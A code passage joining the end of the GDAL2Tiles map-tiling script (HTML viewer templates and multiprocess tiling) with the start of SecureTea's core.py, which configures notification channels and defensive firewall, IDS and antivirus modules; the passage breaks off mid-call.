mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom )
);
if (mapBounds.intersects(tileBounds)) {
return zoom+"/"+tile.x+"/"+y+".png";
} else {
return "http://www.maptiler.org/img/none.png";
}
}
// IE 7-: support for PNG alpha channel
// Unfortunately, the opacity for whole overlay is then not changeable, either or...
tilelayer.isPng = function() { return true;};
tilelayer.getOpacity = function() { return opacity; }
overlay = new GTileLayerOverlay( tilelayer );
map.addOverlay(overlay);
map.addControl(new GLargeMapControl());
map.addControl(new GHierarchicalMapTypeControl());
map.addControl(new CTransparencyControl( overlay ));
""" % args # noqa
if self.kml:
s += """
map.addMapType(G_SATELLITE_3D_MAP);
map.getEarthInstance(getEarthInstanceCB);
"""
s += """
map.enableContinuousZoom();
map.enableScrollWheelZoom();
map.setMapType(G_HYBRID_MAP);
}
resize();
}
"""
if self.kml:
s += """
function getEarthInstanceCB(object) {
var ge = object;
if (ge) {
var url = document.location.toString();
url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml';
var link = ge.createLink("");
if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") }
else { link.setHref(url) };
var networkLink = ge.createNetworkLink("");
networkLink.setName("TMS Map Overlay");
networkLink.setFlyToView(true);
networkLink.setLink(link);
ge.getFeatures().appendChild(networkLink);
} else {
// alert("You should open a KML in Google Earth");
// add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML?
}
}
""" % args # noqa
s += """
onresize=function(){ resize(); };
//]]>
</script>
</head>
<body onload="load()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
</body>
</html>
""" % args # noqa
return s
def generate_leaflet(self):
"""
Template for leaflet.html implementing overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title.replace('"', '\\"')
args['htmltitle'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['centerlon'] = (args['north'] + args['south']) / 2.
args['centerlat'] = (args['west'] + args['east']) / 2.
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['beginzoom'] = self.tmaxz
args['tile_size'] = self.tile_size # not used
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url # not used
args['copyright'] = self.options.copyright.replace('"', '\\"')
s = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' />
<title>%(htmltitle)s</title>
<!-- Leaflet -->
<link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.css" />
<script src="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.js"></script>
<style>
body { margin:0; padding:0; }
body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; }
#map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */
.ctl {
padding: 2px 10px 2px 10px;
background: white;
background: rgba(255,255,255,0.9);
box-shadow: 0 0 15px rgba(0,0,0,0.2);
border-radius: 5px;
text-align: right;
}
.title {
font-size: 18pt;
font-weight: bold;
}
.src {
font-size: 10pt;
}
</style>
</head>
<body>
<div id="map"></div>
<script>
/* **** Leaflet **** */
// Base layers
// .. OpenStreetMap
var osm = L.tileLayer('http://{s}.tile.osm.org/{z}/{x}/{y}.png', {attribution: '© <a href="http://osm.org/copyright">OpenStreetMap</a> contributors', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. CartoDB Positron
var cartodb = L.tileLayer('http://{s}.basemaps.cartocdn.com/light_all/{z}/{x}/{y}.png', {attribution: '© <a href="http://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, © <a href="http://cartodb.com/attributions">CartoDB</a>', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. OSM Toner
var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. White background
var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg==", {minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// Overlay layers (TMS)
var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {tms: true, opacity: 0.7, attribution: "%(copyright)s", minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// Map
var map = L.map('map', {
center: [%(centerlon)s, %(centerlat)s],
zoom: %(beginzoom)s,
minZoom: %(minzoom)s,
maxZoom: %(maxzoom)s,
layers: [osm]
});
var basemaps = {"OpenStreetMap": osm, "CartoDB Positron": cartodb, "Stamen Toner": toner, "Without background": white}
var overlaymaps = {"Layer": lyr}
// Title
var title = L.control();
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl title');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = "%(title)s";
};
title.addTo(map);
// Note
var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>';
var title = L.control({position: 'bottomleft'});
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl src');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = src;
};
title.addTo(map);
// Add base layers
L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map);
// Fit to overlay bounds (SW and NE points with (lat, lon))
map.fitBounds([[%(south)s, %(east)s], [%(north)s, %(west)s]]);
</script>
</body>
</html>
""" % args # noqa
return s
def generate_openlayers(self):
"""
Template for openlayers.html implementing overlay of available Spherical Mercator layers.
It returns filled string. Expected variables:
title, bingkey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title
args['bingkey'] = self.options.bingkey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
if self.options.tmscompatible:
args['tmsoffset'] = "-1"
else:
args['tmsoffset'] = ""
if self.options.profile == 'raster':
args['rasterzoomlevels'] = self.tmaxz + 1
args['rastermaxresolution'] = 2**(self.nativezoom) * self.out_gt[1]
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
<head>
<title>%(title)s</title>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
.olImageLoadError { display: none; }
.olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; }
</style>""" % args # noqa
if self.options.profile == 'mercator':
s += """
<script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script>
""" % args
s += """
<script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script>
<script>
var map;
var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s);
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var emptyTileURL = "http://www.maptiler.org/img/none.png";
OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3;
function init(){""" % args
if self.options.profile == 'mercator':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:3857",
displayProjection: new OpenLayers.Projection("EPSG:4326"),
numZoomLevels: 20
};
map = new OpenLayers.Map(options);
// Create Google Mercator layers
var gmap = new OpenLayers.Layer.Google("Google Streets",
{
type: google.maps.MapTypeId.ROADMAP,
sphericalMercator: true
});
var gsat = new OpenLayers.Layer.Google("Google Satellite",
{
type: google.maps.MapTypeId.SATELLITE,
sphericalMercator: true
});
var ghyb = new OpenLayers.Layer.Google("Google Hybrid",
{
type: google.maps.MapTypeId.HYBRID,
sphericalMercator: true
});
var gter = new OpenLayers.Layer.Google("Google Terrain",
{
type: google.maps.MapTypeId.TERRAIN,
sphericalMercator: true
});
// Create Bing layers
var broad = new OpenLayers.Layer.Bing({
name: "Bing Roads",
key: "%(bingkey)s",
type: "Road",
sphericalMercator: true
});
var baer = new OpenLayers.Layer.Bing({
name: "Bing Aerial",
key: "%(bingkey)s",
type: "Aerial",
sphericalMercator: true
});
var bhyb = new OpenLayers.Layer.Bing({
name: "Bing Hybrid",
key: "%(bingkey)s",
type: "AerialWithLabels",
sphericalMercator: true
});
// Create OSM layer
var osm = new OpenLayers.Layer.OSM("OpenStreetMap");
// create TMS Overlay layer
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([gmap, gsat, ghyb, gter,
broad, baer, bhyb,
osm, tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds.transform(map.displayProjection, map.projection));
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:4326"
};
map = new OpenLayers.Map(options);
var wms = new OpenLayers.Layer.WMS("VMap0",
"http://tilecache.osgeo.org/wms-c/Basic.py?",
{
layers: 'basic',
format: 'image/png'
}
);
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([wms,tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds);
""" % args # noqa
elif self.options.profile == 'raster':
s += """
var options = {
div: "map",
controls: [],
maxExtent: new OpenLayers.Bounds(%(west)s, %(south)s, %(east)s, %(north)s),
maxResolution: %(rastermaxresolution)f,
numZoomLevels: %(rasterzoomlevels)d
};
map = new OpenLayers.Map(options);
var layer = new OpenLayers.Layer.TMS("TMS Layer", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
getURL: getURL
});
map.addLayer(layer);
map.zoomToExtent(mapBounds);
""" % args # noqa
s += """
map.addControls([new OpenLayers.Control.PanZoomBar(),
new OpenLayers.Control.Navigation(),
new OpenLayers.Control.MousePosition(),
new OpenLayers.Control.ArgParser(),
new OpenLayers.Control.Attribution()]);
}
""" % args
if self.options.profile == 'mercator':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom();
if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') {
z+=1;
}
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom()%(tmsoffset)s;
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'raster':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
var z = this.getServerZoom();
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
s += """
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
if (map.updateSize) { map.updateSize(); };
}
onresize=function(){ resize(); };
</script>
</head>
<body onload="init()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
<script type="text/javascript" >resize()</script>
</body>
</html>""" % args # noqa
return s
def worker_tile_details(input_file, output_folder, options, send_pipe=None):
try:
gdal2tiles = GDAL2Tiles(input_file, output_folder, options)
gdal2tiles.open_input()
gdal2tiles.generate_metadata()
tile_job_info, tile_details = gdal2tiles.generate_base_tiles()
return_data = (tile_job_info, tile_details)
if send_pipe:
send_pipe.send(return_data)
return return_data
except Exception as e:
print("worker_tile_details failed ", str(e))
def progress_printer_thread(queue, nb_jobs):
pb = ProgressBar(nb_jobs)
pb.start()
for _ in range(nb_jobs):
queue.get()
pb.log_progress()
queue.task_done()
class ProgressBar(object):
def __init__(self, total_items):
self.total_items = total_items
self.nb_items_done = 0
self.current_progress = 0
self.STEP = 2.5
def start(self):
sys.stdout.write("0")
def log_progress(self, nb_items=1):
self.nb_items_done += nb_items
progress = float(self.nb_items_done) / self.total_items * 100
if progress >= self.current_progress + self.STEP:
done = False
while not done:
if self.current_progress + self.STEP <= progress:
self.current_progress += self.STEP
if self.current_progress % 10 == 0:
sys.stdout.write(str(int(self.current_progress)))
if self.current_progress == 100:
sys.stdout.write("\n")
else:
sys.stdout.write(".")
else:
done = True
sys.stdout.flush()
def get_tile_swne(tile_job_info, options):
if options.profile == 'mercator':
mercator = GlobalMercator()
tile_swne = mercator.TileLatLonBounds
elif options.profile == 'geodetic':
geodetic = GlobalGeodetic(options.tmscompatible)
tile_swne = geodetic.TileLatLonBounds
elif options.profile == 'raster':
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if tile_job_info.kml and tile_job_info.in_srs_wkt:
in_srs = osr.SpatialReference()
in_srs.ImportFromWkt(tile_job_info.in_srs_wkt)
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1])
west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tile_size * pixelsizex
east = west + tile_job_info.tile_size * pixelsizex
south = tile_job_info.ominy + y * tile_job_info.tile_size * pixelsizex
north = south + tile_job_info.tile_size * pixelsizex
if not tile_job_info.is_epsg_4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
tile_swne = rastertileswne
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
return tile_swne
def single_threaded_tiling(input_file, output_folder, options):
"""
Keep a single threaded version that stays clear of multiprocessing, for platforms that would not
support it
"""
if options.verbose:
print("Begin tiles details calc")
conf, tile_details = worker_tile_details(input_file, output_folder, options)
if options.verbose:
print("Tiles details calc complete.")
if not options.verbose and not options.quiet:
progress_bar = ProgressBar(len(tile_details))
progress_bar.start()
for tile_detail in tile_details:
create_base_tile(conf, tile_detail)
if not options.verbose and not options.quiet:
progress_bar.log_progress()
if getattr(threadLocal, 'cached_ds', None):
del threadLocal.cached_ds
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def multi_threaded_tiling(input_file, output_folder, options):
nb_processes = options.nb_processes or 1
# Make sure that all processes do not consume more than `gdal.GetCacheMax()`
os.environ['GDAL_CACHEMAX'] = '%d' % max(1, int(gdal.GetCacheMax() / 1024 / 1024 / nb_processes))
(conf_receiver, conf_sender) = Pipe(False)
if options.verbose:
print("Begin tiles details calc")
p = Process(target=worker_tile_details,
args=[input_file, output_folder, options],
kwargs={"send_pipe": conf_sender})
p.start()
# Make sure to consume the queue before joining. If the payload is too big, it won't be put in
# one go in the queue and therefore the sending process will never finish, waiting for space in
# the queue to send data
conf, tile_details = conf_receiver.recv()
p.join()
if options.verbose:
print("Tiles details calc complete.")
# Have to create the Queue through a multiprocessing.Manager to get a Queue Proxy,
# otherwise you can't pass it as a param in the method invoked by the pool...
manager = Manager()
queue = manager.Queue()
pool = Pool(processes=nb_processes)
# TODO: gbataille - check the confs for which each element is an array... one useless level?
# TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..."
for tile_detail in tile_details:
pool.apply_async(create_base_tile, (conf, tile_detail), {"queue": queue})
if not options.verbose and not options.quiet:
p = Process(target=progress_printer_thread, args=[queue, len(tile_details)])
p.start()
pool.close()
pool.join() # Jobs finished
if not options.verbose and not options.quiet:
p.join() # Traces done
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def main():
# TODO: gbataille - use mkdtemp to work in a temp directory
# TODO: gbataille - debug intermediate tiles.vrt not produced anymore?
# TODO: gbataille - Refactor generate overview tiles to not depend on self variables
argv = gdal.GeneralCmdLineProcessor(sys.argv)
input_file, output_folder, options = process_args(argv[1:])
nb_processes = options.nb_processes or 1
if nb_processes == 1:
single_threaded_tiling(input_file, output_folder, options)
else:
multi_threaded_tiling(input_file, output_folder, options)
if __name__ == '__main__':
main()
# vim: set tabstop=4 shiftwidth=4 expandtab:
|
core.py
|
# -*- coding: utf-8 -*-
u"""SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Version: 1.1
Module: SecureTea
"""
# To share mouse gestures
import struct
import sys
import time
import threading
from securetea import configurations
from securetea import logger
from securetea.lib.notifs import secureTeaTwitter
from securetea.lib.notifs.secureTeaTelegram import SecureTeaTelegram
from securetea.lib.notifs import secureTeaSlack
from securetea.lib.notifs.aws import secureTeaAwsSES
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.notifs import secureTeaTwilio
from securetea.lib.notifs import secureTeaGmail
from securetea.args.arguments import get_args
from securetea.args.args_helper import ArgsHelper
from securetea.lib.firewall.utils import setup_logger
from securetea.lib.security_header import secureTeaHeaders
from securetea.lib.ids import secureTeaIDS
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.iot import iot_checker
from securetea.modes import server_mode
from securetea.modes import system_mode
from securetea.modes import iot_mode
pynput_status = True
try:
from pynput import mouse
except Exception as e:
pynput_status = False
class SecureTea(object):
"""SecureTea Class."""
alert_count = 1
def __init__(self):
"""Init SecureTea params.
Args:
None
Raises:
None
Returns:
None
Working:
Collects the arguments passed and calls the respected module accordingly
for parsing the arguments. Further, creates object for the demanded
notification medium and starts SecureTea.
"""
modulename = 'Core'
self.cred = {}
args = get_args()
argsHelper = ArgsHelper(args)
args_dict = argsHelper.check_args()
credentials = configurations.SecureTeaConf()
self.cred = args_dict['cred']
self.cred_provided = args_dict['cred_provided']
self.twitter_provided = args_dict['twitter_provided']
self.telegram_provided = args_dict['telegram_provided']
self.twilio_provided = args_dict['twilio_provided']
self.slack_provided = args_dict['slack_provided']
self.aws_ses_provided = args_dict['aws_ses_provided']
self.gmail_provided = args_dict['gmail_provided']
self.firewall_provided = args_dict['firewall_provided']
self.insecure_headers_provided = args_dict['insecure_headers_provided']
self.ids_provided = args_dict['ids_provided']
self.system_log_provided = args_dict['system_log_provided']
self.server_log_provided = args_dict['server_log_provided']
self.auto_server_patcher_provided = args_dict['auto_server_patcher_provided']
self.web_deface_provided = args_dict['web_deface_provided']
self.antivirus_provided = args_dict['antivirus_provided']
self.iot_checker_provided = args_dict['iot_checker_provided']
self.server_mode = args_dict["server_mode"]
self.system_mode = args_dict["system_mode"]
self.iot_mode = args_dict["iot_mode"]
# Initialize logger
self.logger = logger.SecureTeaLogger(
modulename,
self.cred['debug']
)
# Setup logger for utils
setup_logger(debug=self.cred['debug'])
if self.cred_provided:
credentials.save_creds(self.cred)
else:
self.cred = credentials.get_creds(args)
try:
if self.cred['twitter']:
self.twitter_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twitter configuration parameter not set.",
logtype="error"
)
try:
if self.cred['telegram']:
self.telegram_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Telegram configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twilio']:
self.twilio_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twilio configuration parameter not set.",
logtype="error"
)
try:
if self.cred['slack']:
self.slack_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Slack configuration parameter not set.",
logtype="error"
)
try:
if self.cred['aws_ses']:
self.aws_ses_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AWS SES configuration parameter not set.",
logtype="error"
)
try:
if self.cred['gmail']:
self.gmail_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Gmail configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['firewall']:
self.firewall_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Firewall configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['insecure_headers']:
self.insecure_headers_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Insecure headers parameter not set.",
logtype="error"
)
try:
if self.cred['ids']:
self.ids_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) not set.",
logtype="error"
)
try:
if self.cred['server_log']:
self.server_log_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Server Log configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['auto_server_patcher']:
self.auto_server_patcher_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Auto server patcher configuraton not set.",
logtype="error"
)
try:
if self.cred['web-deface']:
self.web_deface_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Web Deface Detection configuraton not set.",
logtype="eror"
)
try:
if self.cred['antivirus']:
self.antivirus_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AntiVirus configuraton not set.",
logtype="error"
)
try:
if self.cred['iot-check']:
self.iot_checker_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"IoT Checker configuraton not set.",
logtype="error"
)
if not self.cred:
self.logger.log(
"Configuration not found.",
logtype="error"
)
sys.exit(0)
if not self.cred_provided:
self.logger.log(
"None of the notifications configured. Exiting...",
logtype="error"
)
sys.exit(0)
self.logger.log(
"Welcome to SecureTea..!! Initializing System",
logtype="info"
)
# Initialize modes at first (Server, System, IoT)
# Check for Server mode
if self.server_mode:
self.logger.log(
"Starting SecureTea in server mode",
logtype="info"
)
# Initialize Server Mode object
self.server_mode_obj = server_mode.ServerMode(cred=self.cred, debug=self.cred["debug"])
self.server_mode_obj.start_server_mode()
# Avoid multiple process of the objects created by the server mode, set their credentials to False
self.firewall_provided = False
self.server_log_provided = False
self.antivirus_provided = False
self.web_deface_provided = False
self.system_log_provided = False
self.auto_server_patcher_provided = False
self.ids_provided = False
# Check for System mode
if self.system_mode:
self.logger.log(
"Starting SecureTea in system mode",
logtype="info"
)
# Initialize System Mode object
self.system_mode_obj = system_mode.SystemMode(cred=self.cred, debug=self.cred["debug"])
self.system_mode_obj.start_system_mode()
# Avoid multiple process of the objects created by the system mode, set their credentials to False
self.firewall_provided = False
self.antivirus_provided = False
self.system_log_provided = False
self.ids_provided = False
# Check for IoT mode
if self.iot_mode:
self.logger.log(
"Starting SecureTea in IoT mode",
logtype="info"
)
# Initialize IoT Mode object
self.iot_mode_obj = iot_mode.IoTMode(cred=self.cred, debug=self.cred["debug"])
self.iot_mode_obj.start_iot_mode()
# Avoid multiple process of the objects created by the IoT mode, set their credentials to False
self.firewall_provided = False
self.ids_provided = False
self.iot_checker_provided = False
if self.twitter_provided:
self.twitter = secureTeaTwitter.SecureTeaTwitter(
self.cred['twitter'],
self.cred['debug']
)
if not self.twitter.enabled:
self.logger.log(
"Twitter notification not configured properly.",
logtype="error"
)
else:
self.twitter.notify("Welcome to SecureTea..!! Initializing System")
if self.telegram_provided:
self.telegram = SecureTeaTelegram(
self.cred['telegram'],
self.cred['debug']
)
if not self.telegram.enabled:
self.logger.log(
"Telegram notification not configured properly.",
logtype="error"
)
else:
self.telegram.notify("Welcome to SecureTea..!! Initializing System")
if self.twilio_provided:
self.twilio = secureTeaTwilio.SecureTeaTwilio(
self.cred['twilio'],
self.cred['debug']
)
if not self.twilio.enabled:
self.logger.log(
"Twilio not configured properly.",
logtype="error"
)
else:
self.twilio.notify("Welcome to SecureTea..!! Initializing System")
if self.slack_provided:
self.slack = secureTeaSlack.SecureTeaSlack(
self.cred['slack'],
self.cred['debug']
)
if not self.slack.enabled:
self.logger.log(
"Slack not configured properly.",
logtype="error"
)
else:
self.slack.notify("Welcome to SecureTea..!! Initializing System")
if self.aws_ses_provided:
self.aws_ses = secureTeaAwsSES.SecureTeaAwsSES(
self.cred['aws_ses'],
self.cred['debug']
)
if not self.aws_ses.enabled:
self.logger.log(
"AWS SES not configured properly.",
logtype="error"
)
else:
self.aws_ses.notify("Welcome to SecureTea..!! Initializing System")
if self.gmail_provided:
self.gmail_obj = secureTeaGmail.SecureTeaGmail(
cred=self.cred['gmail'],
debug=self.cred['debug']
)
if not self.gmail_obj.enabled:
self.logger.log(
"Gmail not configured properly.",
logtype="error"
)
else:
self.gmail_obj.notify("Welcome to SecureTea..!! Initializing System")
if self.firewall_provided:
try:
if self.cred['firewall']:
firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.cred['debug'])
firewallObj.start_firewall()
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
if self.insecure_headers_provided:
try:
if self.cred['insecure_headers']:
url = self.cred['insecure_headers']['url']
insecure_headers_obj = secureTeaHeaders.SecureTeaHeaders(url=url,
debug=self.cred['debug'])
insecure_headers_obj.analyze()
except KeyError:
self.logger.log(
"Insecure headers parameter not configured.",
logtype="error"
)
if self.ids_provided:
try:
if self.cred['ids']:
ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
